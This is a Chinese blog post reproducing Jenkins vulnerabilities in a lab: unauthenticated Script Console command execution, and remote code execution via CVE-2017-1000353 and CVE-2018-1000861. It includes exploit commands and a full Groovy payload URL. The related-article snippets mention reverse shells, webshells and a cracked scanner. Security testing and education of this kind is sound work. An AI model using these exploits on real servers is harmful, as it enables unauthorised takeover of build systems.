Jenkins未授权访问漏洞&命令执行

最新推荐文章于 2024-05-10 08:00:00 发布
最新推荐文章于 2024-05-10 08:00:00 发布
阅读量8.7k 收藏 5
点赞数 1
文章标签: css less 安全 go zookeeper
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_45434762/article/details/115291413
版权

Jenkins未授权访问漏洞

环境准备

下载安装包,版本1.620.1.1.norach

wget http://archives.jenkins-ci.org/redhat/jenkins-1.620-1.1.noarch.rpm


安装Jenkins

rpm -ivh jenkins-1.620-1.1.noarch.rpm


启动Jenkins服务

service jenkins start


关闭防火墙或放行8080端口

systemctl stop firewalld.service

未授权访问地址

http://192.168.254.151:8080/manage
http://192.168.254.151:8080/script

访问manage页面

进入Script Console


进入Script Console之后是一个执行脚本的页面

查询当前用户

println "whoami".execute().text


查看IP配置信息

println "ifconfig -a".execute().text

Jenkins 远程代码执行漏洞

版本:2.46.1

POC

https://github.com/vulhub/CVE-2017-1000353

生成序列化字符串

jar包地址:

https://github.com/vulhub/CVE-2017-1000353/releases/download/1.1/CVE-2017-1000353-1.1-SNAPSHOT-all.jar


生成字节码命令

java -jar CVE-2017-1000353-1.1-SNAPSHOT-all.jar jenkins_poc.ser "touch /tmp/success"
# jenkins_poc.ser是生成的字节码文件名
# "touch ..."是待执行的任意命令

发送数据包执行命令

python3 exploit.py http://your-ip:8080 jenkins_poc.ser

检查文件是否创建

docker exec cve-2017-1000353_jenkins_1 ls /tmp/

Jenkins远程命令执行漏洞

CVE-2018-1000861

版本:2.138

POC

http://your-ip:8080/securityRealm/user/admin/descriptorByName/org.jenkinsci.plugins.scriptsecurity.sandbox.groovy.SecureGroovyScript/checkScript
?sandbox=true
&value=public class x {
  public x(){
    "touch /tmp/success".execute()
  }
}

检查文件是否创建

docker exec cve-2018-1000861_jenkins_1 ls -lha /tmp/

加入我的星球

下方查看历史文章

VulnHub之DC-1

VulnHub之DC-2

VulnHub之DC-3

VulnHub之DC-4

VulnHub之MuzzyBox

【工具分享】AWVS 12 汉化破解版

通达OA任意上传&文件包含漏洞复现

扫描二维码

获取更多精彩

NowSec

NowSec
关注
  • 1
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Jenkins功能授权访问导致的远程命令执行漏洞
limb0的博客
11-21 3274
Jenkins功能授权访问导致的远程命令执行漏洞 一、漏洞介绍 Jenkins管理登陆之后,后台”系统管理”功能,有个”脚本命令行的”功能,它的作用是执行用于管理或故障探测或诊断的任意脚本命令,利用该功能,可以执行系统命令,该功能实际上Jenkins正常的功能,由于很多管理账号使用了弱口令,或者管理后台存在授权访问,导致该功能会对Jenkins系统服务器产生比较严重的影响和危害。 二、漏洞危害...
Jenkins授权访问漏洞
qq_50854662的博客
07-08 1712
Jenkins授权访问漏洞
授权访问Jenkins授权访问漏洞
最新发布
qq_68163788的博客
05-10 993
enkins是一个流行的开源持续集成和持续交付工具,用于自动化软件开发过程中的构建、测试和部署。然而,Jenkins存在一个授权访问漏洞,即攻击者可以通过授权的方式访问Jenkins服务器,可能导致敏感信息泄露、恶意代码执行安全风险。攻击者可以利用这个漏洞来获取对Jenkins服务器的控制权,进而破坏软件构建过程,篡改部署流程或者窃取敏感数据。为了防范此类漏洞,管理员应该及时更新Jenkins软件版本、配置访问控制策略、监控系统日志等措施来加强安全防护。
Jenkins授权访问+命令执行
m0_49577923的博客
11-11 5799
前言 翻越高山需要迈出一个又一个简单的步伐 一、Jenkins简介 Jenkins是一个独立的、开放源码的自动化服务器,它可以用于自动化与构建、测试、交付或部署软件相关的各种任务。Jenkins是一个CI工具。它可以根据设定持续定期编译,运行相应代码;运行UT或集成测试;将运行结果发送至邮件,或展示成报告 二、Jenkins授权访问 由于Jenkins默认安装的时候管理员安全意识不高,没有配置密码,所以可以导致任意用户授权访问到控制页面并且可以对里面的配置进行修改。 正常页面应该是需
Jenkins授权访问
Z_l123的博客
03-04 792
漏洞原因 Jenkins系统后台中可以执行系统脚本命令,(本作用是故障排除和诊断使用) 利用条件 1.使用低版本的Jenkins,默认没有登录控制 2.有登录控制,但配置文件中设置了不启用安全性(/var/lib/jenkins/config.xml 设置为false) 3.控制台使用了弱密码 漏洞复现 登录到靶场 登录 admin/admin 系统管理>全局安全配置(低版本的Jenkins,默认没有登录控制,所以这里要修改) 退出登录,系统管理>脚本命令 ..
常见授权访问漏洞总结1
08-04
漏洞简介以及危害config set dir /var/spool/cron
jenkins shell 命令,自动部署命令.txt
07-13
放在Post Steps 的shell命令 ,一键自动部署(2021最新版)
jenkins 执行远程linux命令
08-15
jenkins 执行远程linux命令jenkins 执行远程linux命令jenkins 执行远程linux命令
99-web漏洞挖掘之授权访问漏洞1
08-03
1、Redis授权访问 3、MongoDB授权访问 4、ZooKeeper 授权访问 5、Elasticsearch 授权访问 6、Memcache
Jenkins Git client插件命令执行漏洞(CVE-2019-10392)1
08-04
Jenkins Git client插件命令执行漏洞(CVE-2019-10392)Jenkins Git client插件命令执行漏洞(CVE-2019-10
授权访问漏洞总结
热门推荐
hackerie的博客
12-28 1万+
目前主要存在授权访问漏洞的有:NFS服务,Samba服务,LDAP,Rsync,FTP,GitLab,Jenkins,MongoDB,Redis,ZooKeeper, ElasticSearch,Memcache,CouchDB,Docker,Solr,Hadoop,Dubbo等, 本文主要介绍一些目前比较常用的一些服务的授权访问,欢迎大家补充! 参考:https://www.secpu
中间件安全-jenkins授权访问
ce666666的博客
01-23 564
0x01 前言 跟着百度一步步做,也算是认识了​ 0x02 jenkins是什么? Jenkins是一个开源软件项目,是基于Java开发的一种持续集成工具,用于监控持续重复的工作,旨在提供一个开放易用的软件平台,使软件项目可以进行持续集成。 ps:不搞java开发,了解即可。 0x03 漏洞概述 授权访问管理控制台,可以通过脚本命令执行系统命令。通过该漏洞,可以后台管理服务,通过脚本命令行功能执行系统命令,如反弹shell,wget写webshell文件。默认端口为8080 0x04 漏洞复现 .
Jenkins远程代码执行漏洞
chaojixiaojingang
09-07 1530
1.资产查找 Fofa:title=”jenkins” 2.漏洞描述: Jenkins是一个开源软件项目,是基于Java开发的一种持续集成工具,用于监控持续重复的工作,旨在提供一个开放易用的软件平台。Jenkins存在远程代码执行漏洞漏洞成因是Jenkins平台提供了一个界面给使用者检查自己的Pipeline脚本,使用GroovyClassLoader.parseClass()来检查Pipeline脚本语法的正确性,攻击者构造特定的代码造成远程代码执行,攻击者通过该漏洞可获取服务器完全...
漏洞学习——授权访问】慧聪网Jenkins系统授权访问
Fly_鹏程万里
02-22 914
漏洞细节 http://58.252.73.136:8007/ (慧聪网询盘宝反馈活动) http://58.252.73.136:8001/login.aspx (慧聪家电城CRM系统) http://58.252.73.136:8080(jenkins管理后台,免密码访问) http://58.252.73.136:8080/script下执行cmd命令 println "ipconfi...
Jenkins授权访问+命令执行反弹shell(复现)
weixin_54227009的博客
05-22 1301
我们大致了解过皮毛,可以在idea新建项目,经过简单调整格式,本地测试可以运行,浏览器访问发现没有Jenkins没有设置密码,直接就授权进后台了。1、打内网的时候通过fscan扫到了一台Jenkins服务的机子。3.3在Jenkins的脚本命令执行反弹shell命令。3.2在菱角社区搞一个反弹shell命令在线生成。2、在系统管理->脚本命令行。3.1在kali上设置监听。
jenkins漏洞
计算机毕业论文源码,学生个人网页制作html源码。贴近用户做网络推广和互联网优化。
03-13 1542
jenkins漏洞概述,Jenkins是一个开源软件项目,它是基于Java开发的一种持续集成工具,用于监控持续重复的工作,旨在提供一个开放易用的软件平台,使软件项目可以进行持续集成。 3月9日,启明星辰VSRC监测到Jenkins官方发布安全公告,修复了Jenkins Server和Update Center中发现的2个跨站脚本漏洞(CVE-2023-27898和CVE-2023-27905,统称为“CorePlague”)。经身份验证的威胁者可利用这些漏洞在受害者的 Jenkins Server上执
jenkins授权rce windows主机getshell
m0_46689007的博客
12-11 1310
由于windows环境,反弹shell不方便,试一下远程下载命令,这里面可以用powershell执行下载命令,从上面我们知道的web绝对路径,下载到根目录下。应该是环境原因连接不了webshell,试试windows环境下的反弹shell,因为目标主机可以执行下载命令,我们下载一个nc,访问存在,上传成功。查看”/dashboard/phpinfo.php”,为phpinfo页面,发现为win10系统,win10基本存在Windows Definder。ip先扫一下全端口,发现只有22,80,443。
Jenkins授权SSH用户执行命令
06-06
Jenkins授权SSH用户执行命令,你需要完成以下步骤: 1. 在Jenkins中创建一个SSH凭据,你可以在Jenkins的凭据管理中创建一个SSH凭据。在创建凭据时,你需要提供SSH用户的用户名和密码或者SSH私钥,以便Jenkins能够连接到SSH服务器。 2. 在Jenkins中创建一个自由风格的项目,在项目的配置中,你需要配置SSH连接信息和要执行命令。在构建步骤中选择"Send files or execute commands over SSH",然后选择先前创建的SSH凭据。在"Exec command"字段中输入要执行命令。例如: ``` ls -la /path/to/your/directory ``` 3. 在"Advanced"选项卡中,你可以配置一些高级选项,例如,远程命令的工作目录,执行命令的超时时间等。 4. 点击"保存"按钮保存项目配置,然后执行构建操作。Jenkins将连接到SSH服务器并执行指定的命令。 注意:在Jenkins执行远程命令需要SSH用户具有足够的权限来执行命令。如果你无法授权SSH用户执行命令,请联系系统管理员或者SSH服务器管理员。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值